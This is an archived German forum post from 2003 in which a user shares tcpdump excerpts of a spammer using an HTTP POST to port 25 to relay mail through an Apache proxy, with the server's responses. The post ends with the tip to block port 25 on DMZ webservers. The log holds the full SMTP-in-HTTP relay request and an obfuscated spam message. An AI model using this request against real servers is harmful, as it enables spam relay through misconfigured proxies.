PDA

Archiv verlassen und diese Seite im Standarddesign anzeigen : Webserver Apache-Hack von Spamer



Houser
27.05.2003, 14:32
Ein Spamer hat via HTTP Post Request auf einem mir bekannten Apache-Server wohl versucht, Mails via Localhost zu verschicken
IP Adresse wurde in ip geändert.
Ausgangs-Quelle war wohl ein Serverhoster in Amerika.
Hier Auszüge aus dem tcpdump Logfile (Mailadressen entfernt)
Schaut mir nach einer gescripteten Attacke aus.
Interessant ist die Umleitung auf Port 25 ...
Tip: Port 25 von DMZ Webservern sofort sperren

POST http://ip:25/ HTTP/1.1
Content-type: application/octet-stream
Content-length: 1572
Host:
HELO
MAIL FROM:
RCPT TO:
RCPT TO:
RCPT TO:
RCPT TO:
DATA
Message-ID: [ID filtered]
To:
Cc:
From:
Subject: 4761everybody is eligable to save money
Date: Sun, 25 May 2003 xx:xx:xx -0500
MIME-Version: 1.0
Content-Type: text/html;
charset="iso-8859-1"
Content-Transfer-Encoding: quoted-printable
<HTML><!-- d cnyrtmavi lvpgqptwr --><P ALIGN=3DCENTER><!-- t nkzikdu aqefeck=
h--><FONT SIZE=3D4 PTSIZE=3D14 FAMILY=3D"SANSSERIF" FACE=3D"Arial" LANG=3D"=
0"><!-- o ninsw-->FREE CASH GRANTS FOR YOU<BR>
<BR>
<P ALIGN=3DLEFT><!-- g wuyksltxc lzycpykbf sqoug--></FONT><!-- g zinsoo rsh=
ker --><FONT COLOR=3D"#000000" BACK=3D"#ffffff" style=3D"BACKGROUND-COLOR:=
#ffffff" SIZE=3D3 PTSIZE=3D12 FAMILY=3D"SANSSERIF" FACE=3D"Arial" LANG=3D"=
0"><!-- v jnjkj ygclx w-->If you own a car then you have to look in to our =
extended auto warranties. We cover everything so you don`t have to worry a=
bout it anymore. Mechanics are too expensive and can take weeks to fix you=
r car. We work with certified dealers to get your car back fast.
So see hat we have to offer.<BR>
<BR>
<A HREF=3D"http://www.hardgomera.org">Get a free quote now</A></P><!-- i pc=
sorwbt ttpfnic--></P><!-- e xabihcf ejd--></FONT><!-- c verygjeo vcadfplb n=
yjs--></HTML><!-- i bwlxqsw ejs-->

.
QUIT
Date: Sun, 25 May 2003 xx:xx:xx GMT
X-Cache: MISS from
Transfer-Encoding: chunked
Content-Type: text/plain; charset=iso-8859-1
978
500 5.5.1 Command unrecognized: "POST / HTTP/1.1"
500 5.5.1 Command unrecognized: "Host: ip:25"
500 5.5.1 Command unrecognized: "Content-length: 1572"
500 5.5.1 Command unrecognized: "Content-type: application/octet-stream"
500 5.5.1 Command unrecognized: "Connection: close"
500 5.5.1 Command unrecognized: ""
250 Hello ip, pleased to meet you
250 2.1.0 ... Sender ok
250 2.1.5 ... Recipient ok
250 2.1.5 ... Recipient ok
250 2.1.5 ... Recipient ok
250 2.1.5 ... Recipient ok
354 Enter mail, end with "." on a line by itself
250 2.0.0 h4PFIOI27034 Message accepted for delivery
503 5.0.0 Need MAIL before RCPT
503 5.0.0 Need MAIL before RCPT
503 5.0.0 Need MAIL before RCPT
503 5.0.0 Need MAIL before RCPT
503 5.0.0 Need MAIL command
421 4.7.0 Too many bad commands; closing connection
Date: Sun, 25 May 2003 xx:xx:xx GMT
Transfer-Encoding: chunked
Content-Type: text/html; charset=iso-8859-1
202
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<HTML><HEAD>
<TITLE>502 Proxy Error</TITLE>
</HEAD><BODY>
<H1>Proxy Error</H1>
The proxy server received an invalid
response from an upstream server.<P>
The proxy server could not handle the request <EM><A HREF="ip:25/">POST ip:25/</A></EM>.<P>
Reason: <STRONG>Could not connect to
remote machine: Connection refused</STRONG><P>
<HR>
<ADDRESS>Apache/1.3.27 Server at ipPort 80</ADDRESS>
</BODY></HTML>